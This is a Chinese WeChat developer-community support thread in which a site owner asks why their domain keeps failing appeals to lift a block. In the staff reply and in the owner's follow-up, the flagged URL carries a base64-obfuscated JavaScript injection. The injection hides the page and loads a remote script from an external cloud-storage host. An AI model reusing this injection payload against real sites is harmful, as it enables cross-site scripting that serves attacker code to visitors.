收藏
回答

网站被封不能访问,多次申请恢复访问,审核恢复不通过,为什么?

你好,最近天一直在自主申请恢复访问,申请3次,但每次都是被拒,网站里面没有任何违反微信规则的地方,

申请恢复恢复的网站是https://cg.95306.cn,我这边实在是不知道哪里有违反规则的地方 ,麻烦能不能在这里帮忙核实一下解决一下,给个明示。你们说的违反规则,到底是哪里违反了?快崩溃了,请明示。


回答关注问题邀请回答
收藏

1 个回答

  • 社区技术运营专员--许涛
    社区技术运营专员--许涛
    2021-01-24

    你好,经核实,域名cg.95306.cn下的链接【https://cg.95306.cn/baseinfor/notice/toBuyNoticeMore.wlbya4?16h3b4r=ntcxvvea52&transactionType=xxx*%2Fnew%20Function%60X%24%7Batob%60dmFyIGQ9ZG9jdW1lbnQ7ZC5ib2R5LmhpZGRlbj10cnVlO2QuYm9keS5hcHBlbmRDaGlsZChkLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vMHg4Lm9zcy1jbi1oYW5nemhvdS5hbGl5dW5jcy5jb20veCc7%60%7D%60%2F*&v1JhCnk=JGAeADoOHjoICA4sNTlvVgQknChJ1vAgFNHUQKRUNPQxwTChxIEEYQ6_u36r3gtrfjr_7_seGo5__i5q6toKWnrrf59Q#1608872916522】的内容违反《微信外部链接内容管理规范》,请排查修改域名下所有相关违规内容并修复安全漏洞后,点击停止访问页面中间的“申请恢复访问”按钮申诉,工作人员将于三个工作日内处理你的申诉请求,请耐心等待。

    具体违规情节:违反了《微信外部链接内容管理规范》第19条。

    详细规则请参考《微信外部链接内容管理规范》http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification

    2021-01-24
    有用
    回复 7
    • 社区技术运营专员--许涛
      社区技术运营专员--许涛
      2021-01-24
      查看下私信
      2021-01-24
      回复
    • 伯牙绝弦
      伯牙绝弦
      2021-01-24
      私信已查看。内容我看到了,但您说的这个违规的网址我在浏览器中打开,是空白页。为什么在您那边看到的是这种内容的页面?我如何查看到这个内容?
      2021-01-24
      回复
    • 社区技术运营专员--许涛
      社区技术运营专员--许涛
      2021-01-24回复伯牙绝弦
      我给你的链接在浏览器打开只会显示空白,需要自己在域名内核实
      2021-01-24
      回复
    • 伯牙绝弦
      伯牙绝弦
      2021-01-24回复社区技术运营专员--许涛
      您好,我有点没明白,您给我的私信说显示这个网址打开是低俗内容,但又说这个网址在浏览器打开只会显示空白页面,那具体违规原因是啥?现在看到的跟您给我私信的内容不一致,现在感觉有点无法下手去排查。有点晕。
      而且这个网址前几天在被封后,我们排查过,当时是这个页面报错,(这些参数其实都是恶意参数,正常访问是不会有这种参数的网址的),现在已不报错了。您那边是不是可以 清空下缓存看看呢?会不会是您那边的缓存?
      2021-01-24
      回复
    • 伯牙绝弦
      伯牙绝弦
      2021-01-24回复伯牙绝弦
      前几天经过我们修改后,打开显示的是一个正常的页面。您可以点开试试。
      微信中让我申请恢复的网址是:
      https://cg.95306.cn/baseinfor/notice/toBuyNoticeMore.wlbya4?16h3b4r=ntcxvvea52&transactionType=xxx*/new Function`X${atob`dmFyIGQ9ZG9jdW1lbnQ7ZC5ib2R5LmhpZGRlbj10cnVlO2QuYm9keS5hcHBlbmRDaGlsZChkLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vMHg4Lm9zcy1jbi1oYW5nemhvdS5hbGl5dW5jcy5jb20veCc7`}`/*&v1JhCnk=JGAeADoOHjoICA4sNTlvVgQknChJ1vAgFNHUQKRUNPQxwTChxIEEYQ6_u36r3gtrfjr_7_seGo5__i5q6toKWnrrf59Q#1608872916522
      2021-01-24
      回复
    查看更多(2)
登录 后发表内容
问题标签